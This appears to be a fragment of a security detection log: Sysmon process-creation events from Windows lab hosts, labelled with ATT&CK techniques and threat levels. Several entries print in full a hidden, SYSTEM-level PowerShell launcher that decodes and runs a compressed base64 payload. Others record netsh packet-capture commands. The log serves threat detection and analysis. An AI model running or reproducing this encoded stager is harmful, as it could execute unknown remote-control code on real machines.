+ C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.485479,2019-07-30T01:33:58.485479+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace show status ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4946
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:58.273
+ 747F3D96-6646-5D3F-0000-0010A7318B00
+ 4148
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c netsh trace show status
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9808
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:26:51.965
+ 365ABB72-AF8B-5CC8-0000-0010AC1B1900
+ 3872
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-2586-5CC9-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-AF8B-5CC8-0000-00101C1A1900
+ 3348
+ C:\Windows\System32\cmd.exe
+ C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.286383,2019-07-30T01:33:58.286383+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4945
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:58.245
+ 747F3D96-6646-5D3F-0000-0010E32E8B00
+ 5084
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656012.106089,2019-05-01T00:26:52.106089+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9807
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:26:51.949
+ 365ABB72-AF8B-5CC8-0000-00101C1A1900
+ 3348
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-2586-5CC9-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-2586-5CC9-0000-0010DC530000
+ 460
+ C:\Windows\System32\services.exe
+ C:\Windows\system32\services.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
